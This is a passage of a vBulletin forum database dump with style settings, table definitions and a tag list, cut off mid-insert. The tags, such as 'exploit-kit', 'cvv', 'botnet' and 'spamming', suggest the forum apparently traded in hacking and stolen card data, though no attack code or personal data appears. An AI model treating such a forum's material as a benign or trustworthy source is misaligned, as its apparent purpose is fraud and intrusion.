\"1559\";s:19:\"SHOWTHREAD_SHOWPOST\";s:4:\"1560\";s:27:\"showthread_similarthreadbit\";s:4:\"1561\";s:25:\"showthread_similarthreads\";s:4:\"1562\";s:11:\"smiliepopup\";s:4:\"1563\";s:20:\"smiliepopup_category\";s:4:\"1564\";s:15:\"smiliepopup_row\";s:4:\"1565\";s:18:\"smiliepopup_smilie\";s:4:\"1566\";s:21:\"smiliepopup_straggler\";s:4:\"1567\";s:12:\"SOCIALGROUPS\";s:4:\"1568\";s:27:\"socialgroups_accepttransfer\";s:4:\"1569\";s:24:\"socialgroups_addpictures\";s:4:\"1570\";s:34:\"socialgroups_addpicture_invalidurl\";s:4:\"1571\";s:34:\"socialgroups_addpicture_messagebit\";s:4:\"1572\";s:32:\"socialgroups_addpicture_messages\";s:4:\"1573\";s:25:\"socialgroups_categorylist\";s:4:\"1574\";s:29:\"socialgroups_categorylist_bit\";s:4:\"1575\";s:31:\"socialgroups_category_cloud_bit\";s:4:\"1576\";s:20:\"socialgroups_confirm\";s:4:\"1577\";s:16:\"socialgroups_css\";s:4:\"1578\";s:27:\"socialgroups_deletemessages\";s:4:\"1579\";s:23:\"socialgroups_discussion\";s:4:\"1580\";s:27:\"socialgroups_discussionview\";s:4:\"1581\";s:31:\"socialgroups_discussion_deleted\";s:4:\"1582\";s:31:\"socialgroups_discussion_ignored\";s:4:\"1583\";s:33:\"socialgroups_discussion_quickedit\";s:4:\"1584\";s:19:\"socialgroups_editor\";s:4:\"1585\";s:17:\"socialgroups_form\";s:4:\"1586\";s:18:\"socialgroups_group\";s:4:\"1587\";s:26:\"socialgroups_grouplist_bit\";s:4:\"1588\";s:29:\"socialgroups_groupmodlist_bit\";s:4:\"1589\";s:25:\"socialgroups_groupsub_bit\";s:4:\"1590\";s:19:\"socialgroups_manage\";s:4:\"1591\";s:22:\"socialgroups_managebit\";s:4:\"1592\";s:26:\"socialgroups_managemembers\";s:4:\"1593\";s:23:\"socialgroups_memberlist\";s:4:\"1594\";s:20:\"socialgroups_message\";s:4:\"1595\";s:28:\"socialgroups_message_deleted\";s:4:\"1596\";s:28:\"socialgroups_message_ignored\";s:4:\"1597\";s:25:\"socialgroups_mygroups_bit\";s:4:\"1598\";s:34:\"socialgroups_mygroups_listview_bit\";s:4:\"1599\";s:25:\"socialgroups_newgroup_bit\";s:4:\"1600\";s:34:\"socialgroups_newgroup_listview_bit\";s:4:\"1601\";s:21:\"socialgroups_overview\";s:4:\"1602\";s:25:\"socialgroups_owngroup_bit\";s:4:\"1603\";s:20:\"socialgroups_picture\";s:4:\"1604\";s:23:\"socialgroups_picturebit\";s:4:\"1605\";s:21:\"socialgroups_pictures\";s:4:\"1606\";s:19:\"socialgroups_search\";s:4:\"1607\";s:22:\"socialgroups_subscribe\";s:4:\"1608\";s:28:\"socialgroups_subscribe_group\";s:4:\"1609\";s:26:\"socialgroups_subscriptions\";s:4:\"1610\";s:21:\"socialgroups_transfer\";s:4:\"1611\";s:10:\"spacersize\";s:4:\"1216\";s:12:\"spacer_close\";s:4:\"1735\";s:11:\"spacer_open\";s:4:\"1736\";s:14:\"STANDARD_ERROR\";s:4:\"1737\";s:19:\"STANDARD_ERROR_LITE\";s:4:\"1738\";s:20:\"STANDARD_ERROR_LOGIN\";s:4:\"1739\";s:17:\"STANDARD_REDIRECT\";s:4:\"1740\";s:9:\"SUBSCRIBE\";s:4:\"1612\";s:20:\"subscribe_choosetype\";s:4:\"1613\";s:24:\"subscribe_confirm_delete\";s:4:\"1614\";s:19:\"subscribe_folderbit\";s:4:\"1615\";s:14:\"subscribe_move\";s:4:\"1616\";s:21:\"subscribe_showfolders\";s:4:\"1617\";s:12:\"subscription\";s:4:\"1618\";s:22:\"subscription_activebit\";s:4:\"1619\";s:25:\"subscription_availablebit\";s:4:\"1620\";s:20:\"subscription_payment\";s:4:\"1621\";s:23:\"subscription_paymentbit\";s:4:\"1622\";s:30:\"subscription_payment_2checkout\";s:4:\"1623\";s:33:\"subscription_payment_authorizenet\";s:4:\"1624\";s:27:\"subscription_payment_ccbill\";s:4:\"1625\";s:33:\"subscription_payment_moneybookers\";s:4:\"1626\";s:27:\"subscription_payment_nochex\";s:4:\"1627\";s:27:\"subscription_payment_paypal\";s:4:\"1628\";s:29:\"subscription_payment_worldpay\";s:4:\"1629\";s:10:\"tablewidth\";s:4:\"1217\";s:6:\"tagbit\";s:4:\"1630\";s:14:\"tagbit_wrapper\";s:4:\"1631\";s:13:\"tag_cloud_box\";s:4:\"1632\";s:20:\"tag_cloud_box_search\";s:4:\"1633\";s:21:\"tag_cloud_headinclude\";s:4:\"1634\";s:14:\"tag_cloud_link\";s:4:\"1635\";s:14:\"tag_cloud_page\";s:4:\"1636\";s:8:\"tag_edit\";s:4:\"1637\";s:13:\"tag_edit_ajax\";s:4:\"1638\";s:13:\"tag_managebit\";s:4:\"1639\";s:10:\"tag_search\";s:4:\"1640\";s:13:\"td, th, p, li\";s:4:\"1193\";s:18:\"textarea, .bginput\";s:4:\"1194\";s:16:\"textareacols_ie4\";s:4:\"1218\";s:16:\"textareacols_ns4\";s:4:\"1219\";s:16:\"textareacols_ns6\";s:4:\"1220\";s:11:\"THREADADMIN\";s:4:\"1641\";s:24:\"threadadmin_authenticate\";s:4:\"1642\";s:21:\"threadadmin_copyposts\";s:4:\"1643\";s:23:\"threadadmin_deleteposts\";s:4:\"1644\";s:24:\"threadadmin_deletethread\";s:4:\"1645\";s:25:\"threadadmin_deletethreads\";s:4:\"1646\";s:20:\"threadadmin_easyspam\";s:4:\"1647\";s:24:\"threadadmin_easyspam_ban\";s:4:\"1648\";s:28:\"threadadmin_easyspam_confirm\";s:4:\"1649\";s:32:\"threadadmin_easyspam_headinclude\";s:4:\"1650\";s:31:\"threadadmin_easyspam_infraction\";s:4:\"1651\";s:26:\"threadadmin_easyspam_ipbit\";s:4:\"1652\";s:30:\"threadadmin_easyspam_ip_option\";s:4:\"1653\";s:34:\"threadadmin_easyspam_skipped_prune\";s:4:\"1654\";s:28:\"threadadmin_easyspam_userbit\";s:4:\"1655\";s:32:\"threadadmin_easyspam_user_option\";s:4:\"1656\";s:22:\"threadadmin_editthread\";s:4:\"1657\";s:26:\"threadadmin_imod_menu_post\";s:4:\"1658\";s:28:\"threadadmin_imod_menu_thread\";s:4:\"1659\";s:18:\"threadadmin_logbit\";s:4:\"1660\";s:22:\"threadadmin_managepost\";s:4:\"1661\";s:22:\"threadadmin_mergeposts\";s:4:\"1662\";s:23:\"threadadmin_mergethread\";s:4:\"1663\";s:24:\"threadadmin_mergethreads\";s:4:\"1664\";s:21:\"threadadmin_moveposts\";s:4:\"1665\";s:22:\"threadadmin_movethread\";s:4:\"1666\";s:23:\"threadadmin_movethreads\";s:4:\"1667\";s:19:\"threadadmin_postbit\";s:4:\"1668\";s:9:\"threadbit\";s:4:\"1669\";s:22:\"threadbit_announcement\";s:4:\"1670\";s:17:\"threadbit_deleted\";s:4:\"1671\";s:19:\"threadbit_lastvisit\";s:4:\"1672\";s:18:\"threadbit_pagelink\";s:4:\"1673\";s:10:\"titleimage\";s:4:\"1769\";s:6:\"USERCP\";s:4:\"1674\";s:24:\"usercp_groupattentionbit\";s:4:\"1675\";s:21:\"usercp_groupinvitebit\";s:4:\"1676\";s:20:\"usercp_nav_folderbit\";s:4:\"1677\";s:27:\"usercp_newvisitormessagebit\";s:4:\"1678\";s:21:\"usercp_reputationbits\";s:4:\"1679\";s:12:\"USERCP_SHELL\";s:4:\"1680\";s:25:\"userfield_checkbox_option\";s:4:\"1681\";s:24:\"userfield_optional_input\";s:4:\"1682\";s:15:\"userfield_radio\";s:4:\"1683\";s:22:\"userfield_radio_option\";s:4:\"1684\";s:16:\"userfield_select\";s:4:\"1685\";s:25:\"userfield_select_multiple\";s:4:\"1686\";s:23:\"userfield_select_option\";s:4:\"1687\";s:18:\"userfield_textarea\";s:4:\"1688\";s:17:\"userfield_textbox\";s:4:\"1689\";s:17:\"userfield_wrapper\";s:4:\"1690\";s:14:\"userinfraction\";s:4:\"1691\";s:17:\"userinfractionbit\";s:4:\"1692\";s:21:\"userinfraction_banbit\";s:4:\"1693\";s:23:\"userinfraction_groupbit\";s:4:\"1694\";s:22:\"userinfraction_infobit\";s:4:\"1695\";s:19:\"userinfraction_view\";s:4:\"1696\";s:8:\"usernote\";s:4:\"1697\";s:13:\"usernote_note\";s:4:\"1698\";s:21:\"visitormessage_editor\";s:4:\"1699\";s:22:\"visitormessage_preview\";s:4:\"1700\";s:25:\"visitormessage_simpleview\";s:4:\"1701\";s:33:\"visitormessage_simpleview_deleted\";s:4:\"1702\";s:9:\"WHOPOSTED\";s:4:\"1703\";s:12:\"whopostedbit\";s:4:\"1704\";s:10:\"WHOSONLINE\";s:4:\"1705\";s:13:\"whosonlinebit\";s:4:\"1706\";s:20:\"whosonline_resolveip\";s:4:\"1707\";s:12:\"td.inlinemod\";s:4:\"1759\";}', 'a:125:{s:12:\"body_bgcolor\";s:7:\"#134A5E\";s:12:\"body_fgcolor\";s:7:\"#235167\";s:12:\"page_bgcolor\";s:7:\"#FFFFFF\";s:12:\"page_fgcolor\";s:7:\"#455867\";s:15:\"tborder_bgcolor\";s:7:\"#D9D9D9\";s:15:\"tborder_fgcolor\";s:7:\"#455867\";s:12:\"tcat_bgcolor\";s:7:\"#26607D\";s:12:\"tcat_fgcolor\";s:7:\"#EDEFF4\";s:13:\"thead_bgcolor\";s:7:\"#EFEFEF\";s:13:\"thead_fgcolor\";s:7:\"#4C6072\";s:13:\"tfoot_bgcolor\";s:7:\"#204252\";s:13:\"tfoot_fgcolor\";s:7:\"#EDEFF4\";s:12:\"alt1_bgcolor\";s:7:\"#F1F1F1\";s:12:\"alt1_fgcolor\";s:7:\"#455867\";s:12:\"alt2_bgcolor\";s:7:\"#F1F1F1\";s:12:\"alt2_fgcolor\";s:7:\"#455867\";s:17:\"inlinemod_bgcolor\";s:7:\"#FFFFCC\";s:17:\"inlinemod_fgcolor\";s:7:\"#455867\";s:15:\"wysiwyg_bgcolor\";s:7:\"#F5F5FF\";s:15:\"wysiwyg_fgcolor\";s:7:\"#455867\";s:12:\"time_fgcolor\";s:7:\"#666686\";s:17:\"highlight_fgcolor\";s:7:\"#FF0000\";s:15:\"fjdpth0_bgcolor\";s:7:\"#F7F7F7\";s:15:\"fjdpth0_fgcolor\";s:7:\"#000000\";s:13:\"panel_bgcolor\";s:7:\"#E4E7F5\";s:13:\"panel_fgcolor\";s:7:\"#455867\";s:21:\"panelsurround_bgcolor\";s:7:\"#D1D4E0\";s:21:\"panelsurround_fgcolor\";s:7:\"#455867\";s:14:\"legend_fgcolor\";s:7:\"#22229C\";s:22:\"vbmenu_control_bgcolor\";s:7:\"#EFEFEF\";s:22:\"vbmenu_control_fgcolor\";s:7:\"#4C6072\";s:20:\"vbmenu_popup_bgcolor\";s:7:\"#D9D9D9\";s:20:\"vbmenu_popup_fgcolor\";s:7:\"#455867\";s:21:\"vbmenu_option_bgcolor\";s:7:\"#F1F1F1\";s:21:\"vbmenu_option_fgcolor\";s:7:\"#455867\";s:21:\"vbmenu_hilite_bgcolor\";s:7:\"#245A75\";s:21:\"vbmenu_hilite_fgcolor\";s:7:\"#E16C04\";s:19:\"body_link_n_fgcolor\";s:7:\"#4C6072\";s:19:\"body_link_v_fgcolor\";s:7:\"#4C6072\";s:19:\"body_link_m_fgcolor\";s:7:\"#E16C04\";s:20:\"tborder_border_color\";s:3:\"1px\";s:19:\"tcat_link_n_fgcolor\";s:7:\"#ffffff\";s:19:\"tcat_link_v_fgcolor\";s:7:\"#ffffff\";s:19:\"tcat_link_m_fgcolor\";s:7:\"#E16C04\";s:20:\"thead_link_n_fgcolor\";s:7:\"#4C6072\";s:20:\"thead_link_v_fgcolor\";s:7:\"#4C6072\";s:20:\"thead_link_m_fgcolor\";s:7:\"#E16C04\";s:20:\"tfoot_link_n_fgcolor\";s:7:\"#EDEFF4\";s:20:\"tfoot_link_v_fgcolor\";s:7:\"#E0E0F6\";s:20:\"tfoot_link_m_fgcolor\";s:7:\"#E16C04\";s:22:\"wysiwyg_link_n_fgcolor\";s:7:\"#4C6072\";s:22:\"wysiwyg_link_v_fgcolor\";s:7:\"#4C6072\";s:22:\"wysiwyg_link_m_fgcolor\";s:7:\"#E16C04\";s:18:\"panel_border_color\";s:11:\" 2px outset\";s:29:\"vbmenu_control_link_n_fgcolor\";s:7:\"#4C6072\";s:29:\"vbmenu_control_link_v_fgcolor\";s:7:\"#4C6072\";s:29:\"vbmenu_control_link_m_fgcolor\";s:7:\"#E16C04\";s:25:\"vbmenu_popup_border_color\";s:3:\"1px\";s:28:\"vbmenu_option_link_n_fgcolor\";s:7:\"#455867\";s:28:\"vbmenu_option_link_v_fgcolor\";s:7:\"#455867\";s:28:\"vbmenu_option_link_m_fgcolor\";s:7:\"#455867\";s:28:\"vbmenu_hilite_link_n_fgcolor\";s:7:\"#E16C04\";s:28:\"vbmenu_hilite_link_v_fgcolor\";s:7:\"#E16C04\";s:28:\"vbmenu_hilite_link_m_fgcolor\";s:7:\"#E16C04\";s:16:\"body_bgcolor_hex\";s:6:\"134A5E\";s:16:\"body_fgcolor_hex\";s:6:\"235167\";s:16:\"page_bgcolor_hex\";s:6:\"FFFFFF\";s:16:\"page_fgcolor_hex\";s:6:\"455867\";s:19:\"tborder_bgcolor_hex\";s:6:\"D9D9D9\";s:19:\"tborder_fgcolor_hex\";s:6:\"455867\";s:16:\"tcat_bgcolor_hex\";s:6:\"26607D\";s:16:\"tcat_fgcolor_hex\";s:6:\"EDEFF4\";s:17:\"thead_bgcolor_hex\";s:6:\"EFEFEF\";s:17:\"thead_fgcolor_hex\";s:6:\"4C6072\";s:17:\"tfoot_bgcolor_hex\";s:6:\"204252\";s:17:\"tfoot_fgcolor_hex\";s:6:\"EDEFF4\";s:16:\"alt1_bgcolor_hex\";s:6:\"F1F1F1\";s:16:\"alt1_fgcolor_hex\";s:6:\"455867\";s:16:\"alt2_bgcolor_hex\";s:6:\"F1F1F1\";s:16:\"alt2_fgcolor_hex\";s:6:\"455867\";s:21:\"inlinemod_bgcolor_hex\";s:6:\"FFFFCC\";s:21:\"inlinemod_fgcolor_hex\";s:6:\"455867\";s:19:\"wysiwyg_bgcolor_hex\";s:6:\"F5F5FF\";s:19:\"wysiwyg_fgcolor_hex\";s:6:\"455867\";s:16:\"time_fgcolor_hex\";s:6:\"666686\";s:21:\"highlight_fgcolor_hex\";s:6:\"FF0000\";s:19:\"fjdpth0_bgcolor_hex\";s:6:\"F7F7F7\";s:19:\"fjdpth0_fgcolor_hex\";s:6:\"000000\";s:17:\"panel_bgcolor_hex\";s:6:\"E4E7F5\";s:17:\"panel_fgcolor_hex\";s:6:\"455867\";s:25:\"panelsurround_bgcolor_hex\";s:6:\"D1D4E0\";s:25:\"panelsurround_fgcolor_hex\";s:6:\"455867\";s:18:\"legend_fgcolor_hex\";s:6:\"22229C\";s:26:\"vbmenu_control_bgcolor_hex\";s:6:\"EFEFEF\";s:26:\"vbmenu_control_fgcolor_hex\";s:6:\"4C6072\";s:24:\"vbmenu_popup_bgcolor_hex\";s:6:\"D9D9D9\";s:24:\"vbmenu_popup_fgcolor_hex\";s:6:\"455867\";s:25:\"vbmenu_option_bgcolor_hex\";s:6:\"F1F1F1\";s:25:\"vbmenu_option_fgcolor_hex\";s:6:\"455867\";s:25:\"vbmenu_hilite_bgcolor_hex\";s:6:\"245A75\";s:25:\"vbmenu_hilite_fgcolor_hex\";s:6:\"E16C04\";s:23:\"body_link_n_fgcolor_hex\";s:6:\"4C6072\";s:23:\"body_link_v_fgcolor_hex\";s:6:\"4C6072\";s:23:\"body_link_m_fgcolor_hex\";s:6:\"E16C04\";s:23:\"tcat_link_n_fgcolor_hex\";s:6:\"FFFFFF\";s:23:\"tcat_link_v_fgcolor_hex\";s:6:\"FFFFFF\";s:23:\"tcat_link_m_fgcolor_hex\";s:6:\"E16C04\";s:24:\"thead_link_n_fgcolor_hex\";s:6:\"4C6072\";s:24:\"thead_link_v_fgcolor_hex\";s:6:\"4C6072\";s:24:\"thead_link_m_fgcolor_hex\";s:6:\"E16C04\";s:24:\"tfoot_link_n_fgcolor_hex\";s:6:\"EDEFF4\";s:24:\"tfoot_link_v_fgcolor_hex\";s:6:\"E0E0F6\";s:24:\"tfoot_link_m_fgcolor_hex\";s:6:\"E16C04\";s:26:\"wysiwyg_link_n_fgcolor_hex\";s:6:\"4C6072\";s:26:\"wysiwyg_link_v_fgcolor_hex\";s:6:\"4C6072\";s:26:\"wysiwyg_link_m_fgcolor_hex\";s:6:\"E16C04\";s:33:\"vbmenu_control_link_n_fgcolor_hex\";s:6:\"4C6072\";s:33:\"vbmenu_control_link_v_fgcolor_hex\";s:6:\"4C6072\";s:33:\"vbmenu_control_link_m_fgcolor_hex\";s:6:\"E16C04\";s:32:\"vbmenu_option_link_n_fgcolor_hex\";s:6:\"455867\";s:32:\"vbmenu_option_link_v_fgcolor_hex\";s:6:\"455867\";s:32:\"vbmenu_option_link_m_fgcolor_hex\";s:6:\"455867\";s:32:\"vbmenu_hilite_link_n_fgcolor_hex\";s:6:\"E16C04\";s:32:\"vbmenu_hilite_link_v_fgcolor_hex\";s:6:\"E16C04\";s:32:\"vbmenu_hilite_link_m_fgcolor_hex\";s:6:\"E16C04\";}', '\r\n ', 'a:27:{s:11:\"cellpadding\";s:1:\"6\";s:11:\"cellspacing\";s:1:\"1\";s:14:\"codeblockwidth\";s:5:\"640px\";s:10:\"formspacer\";s:1:\"3\";s:9:\"formwidth\";s:5:\"640px\";s:16:\"formwidth_usercp\";s:5:\"480px\";s:11:\"htmldoctype\";s:121:\"\";s:16:\"htmlextrasfolder\";s:10:\"htmlextras\";s:12:\"imagesfolder\";s:6:\"images\";s:12:\"messagewidth\";s:5:\"540px\";s:19:\"messagewidth_usercp\";s:5:\"380px\";s:16:\"outerborderwidth\";s:2:\"20\";s:10:\"spacersize\";s:2:\"25\";s:10:\"tablewidth\";s:4:\"100%\";s:16:\"textareacols_ie4\";s:2:\"70\";s:16:\"textareacols_ns4\";s:2:\"50\";s:16:\"textareacols_ns6\";s:2:\"65\";s:13:\"imgdir_attach\";s:26:\"images/sleekpassion/attach\";s:13:\"imgdir_button\";s:27:\"images/sleekpassion/buttons\";s:13:\"imgdir_editor\";s:26:\"images/sleekpassion/editor\";s:11:\"imgdir_misc\";s:24:\"images/sleekpassion/misc\";s:11:\"imgdir_poll\";s:25:\"images/sleekpassion/polls\";s:13:\"imgdir_rating\";s:26:\"images/sleekpassion/rating\";s:17:\"imgdir_reputation\";s:30:\"images/sleekpassion/reputation\";s:17:\"imgdir_statusicon\";s:30:\"images/sleekpassion/statusicon\";s:15:\"outertablewidth\";s:3:\"770\";s:10:\"titleimage\";s:0:\"\";}', '', 'a:8:{s:14:\"pi_button_down\";a:4:{i:0;s:7:\"#98B5E2\";i:1;s:7:\"#000000\";i:2;s:3:\"0px\";i:3;s:17:\"1px solid #316AC5\";}s:15:\"pi_button_hover\";a:4:{i:0;s:7:\"#C1D2EE\";i:1;s:7:\"#000000\";i:2;s:3:\"0px\";i:3;s:17:\"1px solid #316AC5\";}s:16:\"pi_button_normal\";a:4:{i:0;s:7:\"#E1E1E2\";i:1;s:7:\"#000000\";i:2;s:3:\"1px\";i:3;s:4:\"none\";}s:18:\"pi_button_selected\";a:4:{i:0;s:7:\"#F1F6F8\";i:1;s:7:\"#000000\";i:2;s:3:\"0px\";i:3;s:17:\"1px solid #316AC5\";}s:12:\"pi_menu_down\";a:4:{i:0;s:7:\"#98B5E2\";i:1;s:7:\"#316AC5\";i:2;s:3:\"0px\";i:3;s:17:\"1px solid #316AC5\";}s:13:\"pi_menu_hover\";a:4:{i:0;s:7:\"#C1D2EE\";i:1;s:7:\"#316AC5\";i:2;s:3:\"0px\";i:3;s:17:\"1px solid #316AC5\";}s:14:\"pi_menu_normal\";a:4:{i:0;s:7:\"#FFFFFF\";i:1;s:7:\"#000000\";i:2;s:3:\"0px\";i:3;s:17:\"1px solid #FFFFFF\";}s:13:\"pi_popup_down\";a:4:{i:0;s:7:\"#98B5E2\";i:1;s:7:\"#000000\";i:2;s:3:\"0px\";i:3;s:17:\"1px solid #316AC5\";}}', 1, 1);
DROP TABLE IF EXISTS `subscribediscussion`;
CREATE TABLE `subscribediscussion` (
`subscribediscussionid` int(10) unsigned NOT NULL AUTO_INCREMENT,
`userid` int(10) unsigned NOT NULL,
`discussionid` int(10) unsigned NOT NULL,
`emailupdate` smallint(5) unsigned NOT NULL DEFAULT '0',
PRIMARY KEY (`subscribediscussionid`),
UNIQUE KEY `userdiscussion` (`userid`,`discussionid`),
KEY `discussionid` (`discussionid`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
DROP TABLE IF EXISTS `subscribeevent`;
CREATE TABLE `subscribeevent` (
`subscribeeventid` int(10) unsigned NOT NULL AUTO_INCREMENT,
`userid` int(10) unsigned NOT NULL DEFAULT '0',
`eventid` int(10) unsigned NOT NULL DEFAULT '0',
`lastreminder` int(10) unsigned NOT NULL DEFAULT '0',
`reminder` int(10) unsigned NOT NULL DEFAULT '3600',
PRIMARY KEY (`subscribeeventid`),
UNIQUE KEY `subindex` (`userid`,`eventid`),
KEY `eventid` (`eventid`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
DROP TABLE IF EXISTS `subscribeforum`;
CREATE TABLE `subscribeforum` (
`subscribeforumid` int(10) unsigned NOT NULL AUTO_INCREMENT,
`userid` int(10) unsigned NOT NULL DEFAULT '0',
`forumid` smallint(5) unsigned NOT NULL DEFAULT '0',
`emailupdate` smallint(5) unsigned NOT NULL DEFAULT '0',
PRIMARY KEY (`subscribeforumid`),
UNIQUE KEY `subindex` (`userid`,`forumid`),
KEY `forumid` (`forumid`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
DROP TABLE IF EXISTS `subscribegroup`;
CREATE TABLE `subscribegroup` (
`subscribegroupid` int(10) unsigned NOT NULL AUTO_INCREMENT,
`userid` int(10) unsigned NOT NULL,
`groupid` int(10) unsigned NOT NULL,
`emailupdate` enum('daily','weekly','none') NOT NULL DEFAULT 'none',
PRIMARY KEY (`subscribegroupid`),
UNIQUE KEY `usergroup` (`userid`,`groupid`),
KEY `groupid` (`groupid`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
DROP TABLE IF EXISTS `subscribethread`;
CREATE TABLE `subscribethread` (
`subscribethreadid` int(10) unsigned NOT NULL AUTO_INCREMENT,
`userid` int(10) unsigned NOT NULL DEFAULT '0',
`threadid` int(10) unsigned NOT NULL DEFAULT '0',
`emailupdate` smallint(5) unsigned NOT NULL DEFAULT '0',
`folderid` int(10) unsigned NOT NULL DEFAULT '0',
`canview` smallint(5) unsigned NOT NULL DEFAULT '1',
PRIMARY KEY (`subscribethreadid`),
UNIQUE KEY `threadid` (`threadid`,`userid`),
KEY `userid` (`userid`,`folderid`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
DROP TABLE IF EXISTS `subscription`;
CREATE TABLE `subscription` (
`subscriptionid` smallint(5) unsigned NOT NULL AUTO_INCREMENT,
`varname` varchar(100) NOT NULL DEFAULT '',
`cost` mediumtext,
`forums` mediumtext,
`nusergroupid` smallint(6) NOT NULL DEFAULT '0',
`membergroupids` varchar(255) NOT NULL DEFAULT '',
`active` smallint(5) unsigned NOT NULL DEFAULT '0',
`options` int(10) unsigned NOT NULL DEFAULT '0',
`displayorder` smallint(5) unsigned NOT NULL DEFAULT '1',
`adminoptions` int(10) unsigned NOT NULL DEFAULT '0',
PRIMARY KEY (`subscriptionid`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
DROP TABLE IF EXISTS `subscriptionlog`;
CREATE TABLE `subscriptionlog` (
`subscriptionlogid` mediumint(8) unsigned NOT NULL AUTO_INCREMENT,
`subscriptionid` smallint(6) NOT NULL DEFAULT '0',
`userid` int(10) unsigned NOT NULL DEFAULT '0',
`pusergroupid` smallint(6) NOT NULL DEFAULT '0',
`status` smallint(6) NOT NULL DEFAULT '0',
`regdate` int(10) unsigned NOT NULL DEFAULT '0',
`expirydate` int(10) unsigned NOT NULL DEFAULT '0',
PRIMARY KEY (`subscriptionlogid`),
KEY `userid` (`userid`,`subscriptionid`),
KEY `subscriptionid` (`subscriptionid`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
DROP TABLE IF EXISTS `subscriptionpermission`;
CREATE TABLE `subscriptionpermission` (
`subscriptionpermissionid` int(10) unsigned NOT NULL AUTO_INCREMENT,
`subscriptionid` int(10) unsigned NOT NULL DEFAULT '0',
`usergroupid` int(10) unsigned NOT NULL DEFAULT '0',
PRIMARY KEY (`subscriptionpermissionid`),
UNIQUE KEY `subscriptionid` (`subscriptionid`,`usergroupid`),
KEY `usergroupid` (`usergroupid`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
DROP TABLE IF EXISTS `tachyforumcounter`;
CREATE TABLE `tachyforumcounter` (
`userid` int(10) unsigned NOT NULL DEFAULT '0',
`forumid` smallint(5) unsigned NOT NULL DEFAULT '0',
`threadcount` mediumint(8) unsigned NOT NULL DEFAULT '0',
`replycount` int(10) unsigned NOT NULL DEFAULT '0',
PRIMARY KEY (`userid`,`forumid`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
DROP TABLE IF EXISTS `tachyforumpost`;
CREATE TABLE `tachyforumpost` (
`userid` int(10) unsigned NOT NULL DEFAULT '0',
`forumid` int(10) unsigned NOT NULL DEFAULT '0',
`lastpost` int(10) unsigned NOT NULL DEFAULT '0',
`lastposter` varchar(100) NOT NULL DEFAULT '',
`lastpostid` int(10) unsigned NOT NULL DEFAULT '0',
`lastthread` varchar(250) NOT NULL DEFAULT '',
`lastthreadid` int(10) unsigned NOT NULL DEFAULT '0',
`lasticonid` smallint(5) unsigned NOT NULL DEFAULT '0',
`lastprefixid` varchar(25) NOT NULL DEFAULT '',
PRIMARY KEY (`userid`,`forumid`),
KEY `forumid` (`forumid`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
DROP TABLE IF EXISTS `tachythreadcounter`;
CREATE TABLE `tachythreadcounter` (
`userid` int(10) unsigned NOT NULL DEFAULT '0',
`threadid` int(10) unsigned NOT NULL DEFAULT '0',
`replycount` int(10) unsigned NOT NULL DEFAULT '0',
PRIMARY KEY (`userid`,`threadid`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
DROP TABLE IF EXISTS `tachythreadpost`;
CREATE TABLE `tachythreadpost` (
`userid` int(10) unsigned NOT NULL DEFAULT '0',
`threadid` int(10) unsigned NOT NULL DEFAULT '0',
`lastpost` int(10) unsigned NOT NULL DEFAULT '0',
`lastposter` varchar(100) NOT NULL DEFAULT '',
`lastpostid` int(10) unsigned NOT NULL DEFAULT '0',
PRIMARY KEY (`userid`,`threadid`),
KEY `threadid` (`threadid`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
DROP TABLE IF EXISTS `tag`;
CREATE TABLE `tag` (
`tagid` int(10) unsigned NOT NULL AUTO_INCREMENT,
`tagtext` varchar(100) NOT NULL DEFAULT '',
`dateline` int(10) unsigned NOT NULL DEFAULT '0',
PRIMARY KEY (`tagid`),
UNIQUE KEY `tagtext` (`tagtext`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
INSERT INTO `tag` (`tagid`, `tagtext`, `dateline`) VALUES
(1, 'exploit-kit', 1425202099),
(2, 'cve-2014-6369', 1425202099),
(3, 'password', 1436022577),
(4, 'dbs', 1446771745),
(5, 'comcast', 1446771745),
(6, 'fucked', 1446771745),
(7, 'cvv', 1450931187),
(11, 'ssh', 1450958185),
(12, 'botnet', 1454514997),
(13, 'w0rm lox', 1456084758),
(14, 'w0rm loshara', 1456084771),
(15, 'spamming', 1458672209),
(16, 'service', 1458672209);
DROP TABLE IF EXISTS `tagsearch`;
CREATE TABLE `tagsearch` (
`tagid` int(10) unsigned NOT NULL DEFAULT '0',
`dateline` int(10) unsigned NOT NULL DEFAULT '0',
KEY `tagid` (`tagid`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
DROP TABLE IF EXISTS `tagthread`;
CREATE TABLE `tagthread` (
`tagid` int(10) unsigned NOT NULL DEFAULT '0',
`threadid` int(10) unsigned NOT NULL DEFAULT '0',
`userid` int(10) unsigned NOT NULL DEFAULT '0',
`dateline` int(10) unsigned NOT NULL DEFAULT '0',
PRIMARY KEY (`tagid`,`threadid`),
KEY `threadid` (`threadid`,`userid`),
KEY `dateline` (`dateline`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
DROP TABLE IF EXISTS `template`;
CREATE TABLE `template` (
`templateid` int(10) unsigned NOT NULL AUTO_INCREMENT,
`styleid` smallint(6) NOT NULL DEFAULT '0',
`title` varchar(100) NOT NULL DEFAULT '',
`template` mediumtext,
`template_un` mediumtext,
`templatetype` enum('template','stylevar','css','replacement') NOT NULL DEFAULT 'template',
`dateline` int(10) unsigned NOT NULL DEFAULT '0',
`username` varchar(100) NOT NULL DEFAULT '',
`version` varchar(30) NOT NULL DEFAULT '',
`product` varchar(25) NOT NULL DEFAULT '',
PRIMARY KEY (`templateid`),
UNIQUE KEY `title` (`title`,`styleid`,`templatetype`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
INSERT INTO `template` (`templateid`, `styleid`, `title`, `template`, `template_un`, `templatetype`, `dateline`, `username`, `version`, `product`) VALUES
